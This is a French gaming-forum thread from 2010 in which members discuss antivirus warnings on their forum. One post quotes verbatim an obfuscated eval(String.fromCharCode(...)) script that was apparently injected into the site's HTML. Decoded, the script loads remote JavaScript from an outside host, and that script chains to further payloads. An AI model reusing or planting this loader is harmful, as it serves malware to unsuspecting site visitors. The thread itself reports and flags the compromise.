PROBLEME FORUM

C'est le forum HRP: annonces d'amélioration du forum, discussions sur les sujets que vous appréciez... faites en ce que vous voulez (mais on ne parle pas de trolls ici)

Modérateur : Modérateurs

Verrouillé
Avatar du membre
Marmotte86
Habitué reconnu
Habitué reconnu
Messages : 5400
Enregistré le : dim. 02 mars 2008, 23:11
Numéro de troll : 93138
Localisation : Rennes

PROBLEME FORUM

Message par Marmotte86 » ven. 09 avr. 2010, 00:34

J'ai dit à Angel que je ne venais pas sur le forum tant que le problème n'était pas réglé, mais j'ai trouvé une solution temporaire ;)

Avast me bloque l'accès au forum depuis ce soir.
Ne comprenant pas, j'ai cherché, et j'ai trouvé un truc qui n'a rien à voir avec Angel dans le code HTML du forum :

Code : Tout sélectionner

kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,108,107,102,106,102,117,105,115,100,104,46,99,111,109,58,51,49,50,57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,115,101,116,84,105,109,101,111,117,116,40,34,108,106,115,40,41,34,44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>
Ceux qui ne comprennent rien, c'est normal, c'est fait pour :D

J'ai décodé ce script, il charge un autre script, qui est lui aussi encodé...
En décodant le suivant, il charge encore un autre script, puis un programme Java...

Je me suis arrêté là, mais en tous cas, ça ne sent pas bon, soit hack du forum, de l'hébergeur ou autre, je laisse Angel s'en occuper.

Pour ma part, je ne reviens pas sur le forum tant qu'avast bloquera l'accès (je le réactive après avoir posté).
Je reste disponible par MP MH et mail/MSN pour ceux qui veulent :)

Marmotte
> Marmotte <
Formé par flogen2 et Gargarof dans le groupe des Pourfendeurs Hétéroclites
Ex-formateur des Marmottrolls
Ex baby-sittroll chez les Catass'Trolls
Ex-membre des Delta Trolls
Ex-formateur d'une bourri-tominette indépendante
En grève

Lala
Floodeur
Floodeur
Messages : 1156
Enregistré le : ven. 21 sept. 2007, 08:42

Re: PROBLEME FORUM

Message par Lala » ven. 09 avr. 2010, 06:59

Effectivement mon antivirus aussi m'avertit qu'un script java tente de se lancer.

Angel Ray
Stratège en Chef
Stratège en Chef
Messages : 22533
Enregistré le : mer. 27 avr. 2005, 18:49
Numéro de troll : 61480

Re: PROBLEME FORUM

Message par Angel Ray » ven. 09 avr. 2010, 08:12

Ca attendra vu que mon pc est en rade actuellement ;) Désolé ^^
Angel Ray - 61480
Image

Avatar du membre
Shemp
Habitué reconnu
Habitué reconnu
Messages : 18569
Enregistré le : jeu. 05 juin 2008, 15:02
Numéro de troll : 35422
Localisation : Du côté de chez Pagnol

Re: PROBLEME FORUM

Message par Shemp » ven. 09 avr. 2010, 08:28

J'ai cette barre qui apparait en rose en haut, mais pourtant j'arrive quand même à poster.
Informations: Ce forum est actuellement désactivé.

Angel Ray
Stratège en Chef
Stratège en Chef
Messages : 22533
Enregistré le : mer. 27 avr. 2005, 18:49
Numéro de troll : 61480

Re: PROBLEME FORUM

Message par Angel Ray » ven. 09 avr. 2010, 09:22

Heu oui c'est bizarre......
Angel Ray - 61480
Image

Avatar du membre
Uruk Khaï
Gros posteur
Gros posteur
Messages : 842
Enregistré le : lun. 22 janv. 2007, 15:07
Numéro de troll : 0
Localisation : seraing

Re: PROBLEME FORUM

Message par Uruk Khaï » ven. 09 avr. 2010, 17:14

Idem, je poste, mais aucun avertissement pour moi, ça doit être parce que je suis sous mac OSX.

Verrouillé